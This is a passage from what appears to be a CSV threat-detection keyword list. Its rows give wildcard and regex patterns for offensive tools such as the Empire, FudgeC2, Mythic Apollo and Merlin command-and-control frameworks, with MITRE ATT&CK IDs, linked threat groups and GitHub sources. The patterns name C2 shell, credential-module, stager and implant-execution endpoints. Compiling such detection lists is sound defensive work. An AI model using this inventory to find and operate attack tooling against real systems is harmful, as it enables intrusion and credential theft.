T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/all/shell?token=*",".{0,1000}\/api\/agents\/all\/shell\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/CXPLDTZCKFNT3SLT/shell?*",".{0,1000}\/api\/agents\/CXPLDTZCKFNT3SLT\/shell\?.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/stale?token=*",".{0,1000}\/api\/agents\/stale\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/XMY2H2ZPFWNPGEAP?token=*",".{0,1000}\/api\/agents\/XMY2H2ZPFWNPGEAP\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/listeners/all?token=*",".{0,1000}\/api\/listeners\/all\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/modules/collection/*?token=*",".{0,1000}\/api\/modules\/collection\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/modules/credentials*?token=*",".{0,1000}\/api\/modules\/credentials.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/reporting/agent/initial?token=*",".{0,1000}\/api\/reporting\/agent\/initial\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/reporting/msg/*?token=*",".{0,1000}\/api\/reporting\/msg\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/reporting/type/checkin?token=*",".{0,1000}\/api\/reporting\/type\/checkin\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/stagers/dll?token=*",".{0,1000}\/api\/stagers\/dll\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/stagers?token=*",".{0,1000}\/api\/stagers\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/users/1/disable?token=*",".{0,1000}\/api\/users\/1\/disable\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/v1/campaign/*/implants/*",".{0,1000}\/api\/v1\/campaign\/.{0,1000}\/implants\/.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/api/v1/implants/*/execute*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/execute.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/api/v1/implants/*/responses*",".{0,1000}\/api\/v1\/implants\/.{0,1000}\/responses.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/api/v2/starkiller*",".{0,1000}\/api\/v2\/starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api_hooking.exe*",".{0,1000}\/api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/api0cradle/CVE-*",".{0,1000}\/api0cradle\/CVE\-.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*/Apollo.exe*",".{0,1000}\/Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/Apollo.git*",".{0,1000}\/Apollo\.git.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/Apollo/Agent/*",".{0,1000}\/Apollo\/Agent\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/ApolloInterop.*",".{0,1000}\/ApolloInterop\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/ApolloInterop/*",".{0,1000}\/ApolloInterop\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/apollon-all-x64*",".{0,1000}\/apollon\-all\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/apollon-main.zip*",".{0,1000}\/apollon\-main\.zip.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/apollon-selective-x64*",".{0,1000}\/apollon\-selective\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*/ApolloTest.exe",".{0,1000}\/ApolloTest\.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/app/bin/merlinAgent*",".{0,1000}\/app\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/aquasecurity/cloudsploit*",".{0,1000}\/aquasecurity\/cloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - 